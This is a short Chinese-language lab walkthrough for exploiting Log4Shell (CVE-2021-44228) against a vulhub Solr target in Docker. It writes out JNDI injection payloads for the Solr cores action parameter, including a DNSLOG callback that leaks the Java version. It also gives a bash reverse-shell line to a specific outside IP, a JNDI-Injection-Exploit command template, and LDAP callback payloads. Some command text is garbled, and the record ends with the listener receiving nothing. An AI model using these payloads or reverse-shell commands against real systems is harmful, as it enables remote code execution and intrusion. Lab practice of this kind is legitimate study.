执行以下命令

启动命令
systemctl start dockercd vulhub/log4j/CVE-2021-44228docker-compose up -d
# 访问网址
http://192.168.3.42：xxxx/solr/#/

        启动靶场环境并在浏览器访问!!!

      先在自己搭建的DNSLOG平台上获取一个域名来监控我们注入的效果. 

            

                 可以发现 /solr/admin/cores?action= 这里有个参数可以传，可以按照上面的原理先构造一个请求传过去存在JNDI注入那么Idap服务端会执行我们传上去的payload然后在DNSLOG平台上那里留下记录，我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号!

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.r2rrt.l0gs.4pts.
online}

              开始反弹Shel准备 INDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!

              bash -i >& /dev/tcp/101.42.118.221/8080 0>&1  改为监听ip进行base64编码

                

               命令模版：

java -jar target/INDI-Injection-Exploit-1.0-SNAPSH0T-all.jar -C bash{echo,[经过base64编码后的命令1}{base64,-d}|bash"-A「你的ypsipl

          开启监听访问日志文件

/solr/admin/cores?action=${jndi:ldap://101.42.118.221:1389/jyvecl}
/solr/admin/cores?action=${jndi:ldap://101.42.118.221:1389/ek9cvn}
${jndi:ldap://101.42.118.221:1389/uma7pn}

       监听不到 后续做出来补：